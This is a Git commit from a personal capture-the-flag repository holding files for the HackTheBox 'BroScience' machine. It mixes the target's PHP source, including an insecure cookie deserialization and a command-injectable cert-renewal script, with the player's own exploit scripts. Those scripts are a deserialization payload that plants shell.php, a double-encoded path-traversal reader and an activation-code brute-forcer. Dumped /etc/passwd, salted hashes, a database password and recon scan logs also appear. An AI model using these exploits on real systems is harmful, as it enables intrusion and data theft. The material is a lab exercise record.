simon/CTF
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

init htb

Browse Source 
old htb folders
This commit is contained in:
Simon
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

63
HTB/broscience/activate.php Normal file
View File

@@ -0,0 +1,63 @@
<?php
session_start();
// Check if user is logged in already
if (isset($_SESSION['id'])) {
header('Location: /index.php');
}
if (isset($_GET['code'])) {
// Check if code is formatted correctly (regex)
if (preg_match('/^[A-z0-9]{32}$/', $_GET['code'])) {
// Check for code in database
include_once 'includes/db_connect.php';
$res = pg_prepare($db_conn, "check_code_query", 'SELECT id, is_activated::int FROM users WHERE activation_code=$1');
$res = pg_execute($db_conn, "check_code_query", array($_GET['code']));
if (pg_num_rows($res) == 1) {
// Check if account already activated
$row = pg_fetch_row($res);
if (!(bool)$row[1]) {
// Activate account
$res = pg_prepare($db_conn, "activate_account_query", 'UPDATE users SET is_activated=TRUE WHERE id=$1');
$res = pg_execute($db_conn, "activate_account_query", array($row[0]));
$alert = "Account activated!";
$alert_type = "success";
} else {
$alert = 'Account already activated.';
}
} else {
$alert = "Invalid activation code.";
}
} else {
$alert = "Invalid activation code.";
}
} else {
$alert = "Missing activation code.";
}
?>
<html>
<head>
<title>BroScience : Activate account</title>
<?php include_once 'includes/header.php'; ?>
</head>
<body>
<?php include_once 'includes/navbar.php'; ?>
<div class="uk-container uk-container-xsmall">
<?php
// Display any alerts
if (isset($alert)) {
?>
<div uk-alert class="uk-alert-<?php if(isset($alert_type)){echo $alert_type;}else{echo 'danger';} ?>">
<a class="uk-alert-close" uk-close></a>
<?=$alert?>
</div>
<?php
}
?>
</div>
</body>
</html>

30
HTB/broscience/ape.php Normal file
View File

@@ -0,0 +1,30 @@
<?php
class Avatar {
public $imgPath;
public function __construct($imgPath) {
$this->imgPath = $imgPath;
}
public function save($tmp) {
$f = fopen($this->imgPath, "w");
fwrite($f, file_get_contents($tmp));
fclose($f);
}
}
class AvatarInterface {
public $tmp = "/etc/passwd";
public $imgPath = "/var/www/html/shell.php";
public function __wakeup() {
$a = new Avatar($this->imgPath);
$a->save($this->tmp);
}
}
$a = new AvatarInterface();
echo base64_encode(serialize($a));
?>

14
HTB/broscience/ape.py Normal file
View File

@@ -0,0 +1,14 @@
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def encode_all(string):
return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string)
if __name__ == '__main__':
while True:
i = input("~ ")
file = f"../includes/{i}"
file = encode_all(file)
file = encode_all(file)
r = requests.get(f"https://broscience.htb/includes/img.php?path={file}", verify=False)
print(r.text)

39
HTB/broscience/etc.passwd Normal file
View File

@@ -0,0 +1,39 @@
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
tss:x:103:109:TPM software stack,,,:/var/lib/tpm:/bin/false
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:105:111:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:106:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:107:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:110:116:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
pulse:x:112:118:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
saned:x:113:121::/var/lib/saned:/usr/sbin/nologin
colord:x:114:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:115:123::/var/lib/geoclue:/usr/sbin/nologin
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
bill:x:1000:1000:bill,,,:/home/bill:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
postgres:x:117:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false

0
HTB/broscience/exercise.php Normal file
View File

5
HTB/broscience/hash Normal file
View File

@@ -0,0 +1,5 @@
13edad4932da9dbb57d9cd15b66ed104:NaCl
15657792073e8a843d4f91fc403454e1:NaCl
bd3dad50e2d578ecba87d5fa15ca5f85:NaCl
a7eed23a7be6fe0d765197b1027453fe:NaCl
5d15340bded5b9395d5d14b9c21bc82b:NaCl

14
HTB/broscience/includes.db_connect.php Normal file
View File

@@ -0,0 +1,14 @@
<?php
$db_host = "localhost";
$db_port = "5432";
$db_name = "broscience";
$db_user = "dbuser";
$db_pass = "RangeOfMotion%777";
$db_salt = "NaCl";
$db_conn = pg_connect("host={$db_host} port={$db_port} dbname={$db_name} user={$db_user} password={$db_pass}");
if (!$db_conn) {
die("<b>Error</b>: Unable to connect to database");
}
?>

118
HTB/broscience/includes.utils.php Normal file
View File

@@ -0,0 +1,118 @@
<?php
function generate_activation_code() {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand(time());
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
return $activation_code;
}
// Source: https://stackoverflow.com/a/4420773 (Slightly adapted)
function rel_time($from, $to = null) {
$to = (($to === null) ? (time()) : ($to));
$to = ((is_int($to)) ? ($to) : (strtotime($to)));
$from = ((is_int($from)) ? ($from) : (strtotime($from)));
$units = array
(
"year" => 29030400, // seconds in a year (12 months)
"month" => 2419200, // seconds in a month (4 weeks)
"week" => 604800, // seconds in a week (7 days)
"day" => 86400, // seconds in a day (24 hours)
"hour" => 3600, // seconds in an hour (60 minutes)
"minute" => 60, // seconds in a minute (60 seconds)
"second" => 1 // 1 second
);
$diff = abs($from - $to);
if ($diff < 1) {
return "Just now";
}
$suffix = (($from > $to) ? ("from now") : ("ago"));
$unitCount = 0;
$output = "";
foreach($units as $unit => $mult)
if($diff >= $mult && $unitCount < 1) {
$unitCount += 1;
// $and = (($mult != 1) ? ("") : ("and "));
$and = "";
$output .= ", ".$and.intval($diff / $mult)." ".$unit.((intval($diff / $mult) == 1) ? ("") : ("s"));
$diff -= intval($diff / $mult) * $mult;
}
$output .= " ".$suffix;
$output = substr($output, strlen(", "));
return $output;
}
class UserPrefs {
public $theme;
public function __construct($theme = "light") {
$this->theme = $theme;
}
}
function get_theme() {
if (isset($_SESSION['id'])) {
if (!isset($_COOKIE['user-prefs'])) {
$up_cookie = base64_encode(serialize(new UserPrefs()));
setcookie('user-prefs', $up_cookie);
} else {
$up_cookie = $_COOKIE['user-prefs'];
}
$up = unserialize(base64_decode($up_cookie));
return $up->theme;
} else {
return "light";
}
}
function get_theme_class($theme = null) {
if (!isset($theme)) {
$theme = get_theme();
}
if (strcmp($theme, "light")) {
return "uk-light";
} else {
return "uk-dark";
}
}
function set_theme($val) {
if (isset($_SESSION['id'])) {
setcookie('user-prefs',base64_encode(serialize(new UserPrefs($val))));
}
}
class Avatar {
public $imgPath;
public function __construct($imgPath) {
$this->imgPath = $imgPath;
}
public function save($tmp) {
$f = fopen($this->imgPath, "w");
fwrite($f, file_get_contents($tmp));
fclose($f);
}
}
class AvatarInterface {
public $tmp;
public $imgPath;
public function __wakeup() {
$a = new Avatar($this->imgPath);
$a->save($this->tmp);
}
}
?>

50
HTB/broscience/index.php Normal file
View File

@@ -0,0 +1,50 @@
<?php
session_start();
?>
<html>
<head>
<title>BroScience : Home</title>
<?php
include_once 'includes/header.php';
include_once 'includes/utils.php';
$theme = get_theme();
?>
<link rel="stylesheet" href="styles/<?=$theme?>.css">
</head>
<body class="<?=get_theme_class($theme)?>">
<?php include_once 'includes/navbar.php'; ?>
<div class="uk-container uk-margin">
<!-- TODO: Search bar -->
<?php
include_once 'includes/db_connect.php';
// Load exercises
$res = pg_query($db_conn, 'SELECT exercises.id, username, title, image, SUBSTRING(content, 1, 100), exercises.date_created, users.id FROM exercises JOIN users ON author_id = users.id');
if (pg_num_rows($res) > 0) {
echo '<div class="uk-child-width-1-2@s uk-child-width-1-3@m" uk-grid>';
while ($row = pg_fetch_row($res)) {
?>
<div>
<div class="uk-card uk-card-default <?=(strcmp($theme,"light"))?"uk-card-secondary":""?>">
<div class="uk-card-media-top">
<img src="includes/img.php?path=<?=$row[3]?>" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=<?=$row[0]?>" class="uk-card-title"><?=$row[2]?></a>
<p><?=$row[4]?>... <a href="exercise.php?id=<?=$row[0]?>">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=<?=$row[6]?>"><?=htmlspecialchars($row[1],ENT_QUOTES,'UTF-8')?></a> <?=rel_time($row[5])?></p>
</div>
</div>
</div>
<?php
}
echo '</div>';
}
?>
</div>
</body>
</html>

80
HTB/broscience/login.php Normal file
View File

@@ -0,0 +1,80 @@
<?php
session_start();
// Check if user is logged in already
if (isset($_SESSION['id'])) {
header('Location: /index.php');
}
// Handle a submitted log in form
if (isset($_POST['username']) && isset($_POST['password'])) {
// Check if variables are empty
if (!empty($_POST['username']) && !empty($_POST['password'])) {
include_once 'includes/db_connect.php';
// Check if username:password is correct
$res = pg_prepare($db_conn, "login_query", 'SELECT id, username, is_activated::int, is_admin::int FROM users WHERE username=$1 AND password=$2');
$res = pg_execute($db_conn, "login_query", array($_POST['username'], md5($db_salt . $_POST['password'])));
if (pg_num_rows($res) == 1) {
// Check if account is activated
$row = pg_fetch_row($res);
if ((bool)$row[2]) {
// User is logged in
$_SESSION['id'] = $row[0];
$_SESSION['username'] = $row[1];
$_SESSION['is_admin'] = $row[3];
// Redirect to home page
header('Location: /index.php');
} else {
$alert = "Account is not activated yet";
}
} else {
$alert = "Username or password is incorrect.";
}
} else {
$alert = "Please fill in both username and password.";
}
}
?>
<html>
<head>
<title>BroScience : Log In</title>
<?php include_once 'includes/header.php'; ?>
</head>
<body>
<?php include_once 'includes/navbar.php'; ?>
<div class="uk-container uk-container-xsmall">
<form class="uk-form-stacked" method="POST" action="login.php">
<fieldset class="uk-fieldset">
<legend class="uk-legend">Log In</legend>
<?php
// Display any alerts
if (isset($alert)) {
?>
<div uk-alert class="uk-alert-<?php if(isset($alert_type)){echo $alert_type;}else{echo 'danger';} ?>">
<a class="uk-alert-close" uk-close></a>
<?=$alert?>
</div>
<?php
}
?>
<div class="uk-margin">
<input name="username" class="uk-input" placeholder="Username">
</div>
<div class="uk-margin">
<input name="password" class="uk-input" type="password" placeholder="Password">
</div>
<div class="uk-margin">
<button class="uk-button uk-button-default" type="submit">Log in</button>
</div>
<div class="uk-margin">
<a href="register.php">Create an account</a>
</div>
</fieldset>
</form>
</div>
</body>
</html>

20
HTB/broscience/login.req Normal file
View File

@@ -0,0 +1,20 @@
POST /login.php HTTP/1.1
Host: broscience.htb
Cookie: PHPSESSID=a8079i4m03ms9345aci7vep369
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: https://broscience.htb
Referer: https://broscience.htb/login.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
username=user&password=pass

82
HTB/broscience/rauser.php Normal file
View File

@@ -0,0 +1,82 @@
<?php
$username = "user" . rand(1,9999);
$email = $username . "@mail.com";
$password = "password";
$url = 'https://broscience.htb/register.php';
//username=user1&email=user1%40email.com&password=password&password-confirm=password
$data = array('username' => $username, 'email' => $email, 'password' => $password, 'password-confirm' => $password);
echo implode(" ",$data). "\n";
// use key 'http' even if you send the request to https://...
$options = array(
"ssl"=>array(
"verify_peer"=>false,
"verify_peer_name"=>false,
),
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data),
)
);
$tstart = time();
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context,);
$tend = time();
echo $tend . " - " . $tstart . " = " . $tend - $tstart . "\n";
function generate_activation_code($t) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand($t);
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
return $activation_code;
}
function check($code){
$url = "https://broscience.htb/activate.php?code=" . $code;
$options = array(
"ssl"=>array(
"verify_peer"=>false,
"verify_peer_name"=>false,
),
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'GET',
)
);
$tstart = time();
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context,);
if ($result === FALSE) { /* Handle error */ }
if(str_contains($result, "Invalid activation code.")){
return false;
}
return true;
}
echo $tstart . " -> ";
$tstart = $tstart - 5;
$code = generate_activation_code($tstart);
while(!check($code)){
$tstart = $tstart + 1;
$code = generate_activation_code($tstart);
}
echo $tstart . "\n";
echo $code
?>

117
HTB/broscience/register.php Normal file
View File

@@ -0,0 +1,117 @@
<?php
session_start();
// Check if user is logged in already
if (isset($_SESSION['id'])) {
header('Location: /index.php');
}
// Handle a submitted register form
if (isset($_POST['username']) && isset($_POST['email']) && isset($_POST['password']) && isset($_POST['password-confirm'])) {
// Check if variables are empty
if (!empty($_POST['username']) && !empty($_POST['email']) && !empty($_POST['password']) && !empty($_POST['password-confirm'])) {
// Check if passwords match
if (strcmp($_POST['password'], $_POST['password-confirm']) == 0) {
// Check if email is too long
if (strlen($_POST['email']) <= 100) {
// Check if email is valid
if (filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)) {
// Check if username is valid
if (strlen($_POST['username']) <= 100) {
// Check if user exists already
include_once 'includes/db_connect.php';
$res = pg_prepare($db_conn, "check_username_query", 'SELECT id FROM users WHERE username = $1');
$res = pg_execute($db_conn, "check_username_query", array($_POST['username']));
if (pg_num_rows($res) == 0) {
// Check if email is registered already
$res = pg_prepare($db_conn, "check_email_query", 'SELECT id FROM users WHERE email = $1');
$res = pg_execute($db_conn, "check_email_query", array($_POST['email']));
if (pg_num_rows($res) == 0) {
// Create the account
include_once 'includes/utils.php';
$activation_code = generate_activation_code();
$res = pg_prepare($db_conn, "check_code_unique_query", 'SELECT id FROM users WHERE activation_code = $1');
$res = pg_execute($db_conn, "check_code_unique_query", array($activation_code));
if (pg_num_rows($res) == 0) {
$res = pg_prepare($db_conn, "create_user_query", 'INSERT INTO users (username, password, email, activation_code) VALUES ($1, $2, $3, $4)');
$res = pg_execute($db_conn, "create_user_query", array($_POST['username'], md5($db_salt . $_POST['password']), $_POST['email'], $activation_code));
// TODO: Send the activation link to email
$activation_link = "https://broscience.htb/activate.php?code={$activation_code}";
$alert = "Account created. Please check your email for the activation link.";
$alert_type = "success";
} else {
$alert = "Failed to generate a valid activation code, please try again.";
}
} else {
$alert = "An account with this email already exists.";
}
}
else {
$alert = "Username is already taken.";
}
} else {
$alert = "Maximum username length is 100 characters.";
}
} else {
$alert = "Please enter a valid email address.";
}
} else {
$alert = "Maximum email length is 100 characters.";
}
} else {
$alert = "Passwords do not match.";
}
} else {
$alert = "Please fill all fields in.";
}
}
?>
<html>
<head>
<title>BroScience : Register</title>
<?php include_once 'includes/header.php'; ?>
</head>
<body>
<?php include_once 'includes/navbar.php'; ?>
<div class="uk-container uk-container-xsmall">
<form class="uk-form-stacked" method="POST" action="register.php">
<fieldset class="uk-fieldset">
<legend class="uk-legend">Register</legend>
<?php
// Display any alerts
if (isset($alert)) {
?>
<div uk-alert class="uk-alert-<?php if(isset($alert_type)){echo $alert_type;}else{echo 'danger';} ?>">
<a class="uk-alert-close" uk-close></a>
<?=$alert?>
</div>
<?php
}
?>
<div class="uk-margin">
<input name="username" class="uk-input" placeholder="Username">
</div>
<div class="uk-margin">
<input name="email" class="uk-input" type="email" placeholder="Email">
</div>
<div class="uk-margin">
<input name="password" class="uk-input" type="password" placeholder="Password">
</div>
<div class="uk-margin">
<input name="password-confirm" class="uk-input" type="password" placeholder="Repeat password">
</div>
<div class="uk-margin">
<button class="uk-button uk-button-default" type="submit">Register</button>
</div>
</fieldset>
</form>
</div>
</body>
</html>

20
HTB/broscience/register.req Normal file
View File

@@ -0,0 +1,20 @@
POST /register.php HTTP/1.1
Host: broscience.htb
Cookie: PHPSESSID=a8079i4m03ms9345aci7vep369
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: https://broscience.htb
Referer: https://broscience.htb/register.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
username=user&email=user%40mail.com&password=password&password-confirm=password

57
HTB/broscience/renew_cert.sh Executable file
View File

@@ -0,0 +1,57 @@
#!/bin/bash
if [ "$#" -ne 1 ] || [ $1 == "-h" ] || [ $1 == "--help" ] || [ $1 == "help" ]; then
echo "Usage: $0 certificate.crt";
exit 0;
fi
if [ -f $1 ]; then
openssl x509 -in $1 -noout -checkend 86400 > /dev/null
if [ $? -eq 0 ]; then
echo "No need to renew yet.";
exit 1;
fi
subject=$(openssl x509 -in $1 -noout -subject | cut -d "=" -f2-)
country=$(echo $subject | grep -Eo 'C = .{2}')
state=$(echo $subject | grep -Eo 'ST = .*,')
locality=$(echo $subject | grep -Eo 'L = .*,')
organization=$(echo $subject | grep -Eo 'O = .*,')
organizationUnit=$(echo $subject | grep -Eo 'OU = .*,')
commonName=$(echo $subject | grep -Eo 'CN = .*,?')
emailAddress=$(openssl x509 -in $1 -noout -email)
country=${country:4}
state=$(echo ${state:5} | awk -F, '{print $1}')
locality=$(echo ${locality:3} | awk -F, '{print $1}')
organization=$(echo ${organization:4} | awk -F, '{print $1}')
organizationUnit=$(echo ${organizationUnit:5} | awk -F, '{print $1}')
commonName=$(echo ${commonName:5} | awk -F, '{print $1}')
echo $subject;
echo "";
echo "Country => $country";
echo "State => $state";
echo "Locality => $locality";
echo "Org Name => $organization";
echo "Org Unit => $organizationUnit";
echo "Common Name => $commonName";
echo "Email => $emailAddress";
echo -e "\nGenerating certificate...";
openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /tmp/temp.key -out /tmp/temp.crt -days 365 <<<"$country
$state
$locality
$organization
$organizationUnit
$commonName
$emailAddress
" 2>/dev/null
/bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"
else
echo "File doesn't exist"
exit 1;
fi

0
HTB/broscience/results/report/local.txt Normal file
View File

24
HTB/broscience/results/report/notes.txt Normal file
View File

@@ -0,0 +1,24 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] http found on tcp/443.
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] http found on tcp/443.

0
HTB/broscience/results/report/proof.txt Normal file
View File

92
HTB/broscience/results/scans/_commands.log Normal file
View File

@@ -0,0 +1,92 @@
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/broscience/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/broscience/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/broscience/results/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_top_100_udp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.195
feroxbuster -u http://10.10.11.195:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.10.11.195:80/.well-known/security.txt
curl -sSikf http://10.10.11.195:80/robots.txt
curl -sSik http://10.10.11.195:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.195
curl -sk -o /dev/null -H "Host: IFNNekNxlqYWYapbffxt.broscience.htb" http://broscience.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.10.11.195:80 2>&1
wkhtmltoimage --format png http://10.10.11.195:80/ /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_screenshot.png
feroxbuster -u https://10.10.11.195:443/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_feroxbuster_dirbuster.txt"
curl -sSikf https://10.10.11.195:443/.well-known/security.txt
curl -sSikf https://10.10.11.195:443/robots.txt
curl -sSik https://10.10.11.195:443/
nmap -vv --reason -Pn -T4 -sV -p 443 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp443/xml/tcp_443_https_nmap.xml" 10.10.11.195
sslscan --show-certificate --no-colour 10.10.11.195:443 2>&1
curl -sk -o /dev/null -H "Host: UAJazqQgdJcyUjSdHhQO.broscience.htb" https://broscience.htb:443/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v https://10.10.11.195:443 2>&1
wkhtmltoimage --format png https://10.10.11.195:443/ /home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_screenshot.png
ffuf -u http://broscience.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.broscience.htb" -fs 332 -noninteractive -s | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_broscience.htb_vhosts_subdomains-top1million-110000.txt"
ffuf -u https://broscience.htb:443/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.broscience.htb" -fs 9308 -noninteractive -s | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_broscience.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/broscience/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/broscience/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/broscience/results/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_top_100_udp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.195
feroxbuster -u http://10.10.11.195:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.10.11.195:80/.well-known/security.txt
curl -sSikf http://10.10.11.195:80/robots.txt
curl -sSik http://10.10.11.195:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.195
curl -sk -o /dev/null -H "Host: XahIdBWOUUpjNeHUGBsD.broscience.htb" http://broscience.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.10.11.195:80 2>&1
wkhtmltoimage --format png http://10.10.11.195:80/ /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_screenshot.png
feroxbuster -u https://10.10.11.195:443/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_feroxbuster_dirbuster.txt"
curl -sSikf https://10.10.11.195:443/.well-known/security.txt
curl -sSikf https://10.10.11.195:443/robots.txt
curl -sSik https://10.10.11.195:443/
nmap -vv --reason -Pn -T4 -sV -p 443 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp443/xml/tcp_443_https_nmap.xml" 10.10.11.195
sslscan --show-certificate --no-colour 10.10.11.195:443 2>&1
curl -sk -o /dev/null -H "Host: uQOhNjfxSNsplaFtrAtO.broscience.htb" https://broscience.htb:443/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v https://10.10.11.195:443 2>&1
wkhtmltoimage --format png https://10.10.11.195:443/ /home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_screenshot.png
ffuf -u http://broscience.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.broscience.htb" -fs 332 -noninteractive -s | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_broscience.htb_vhosts_subdomains-top1million-110000.txt"
ffuf -u https://broscience.htb:443/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.broscience.htb" -fs 9308 -noninteractive -s | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_broscience.htb_vhosts_subdomains-top1million-110000.txt"

103
HTB/broscience/results/scans/_full_tcp_nmap.txt Normal file
View File

@@ -0,0 +1,103 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/broscience/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_full_tcp_nmap.xml 10.10.11.195
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.040s latency).
Scanned at 2023-02-01 17:49:39 CET for 62s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)
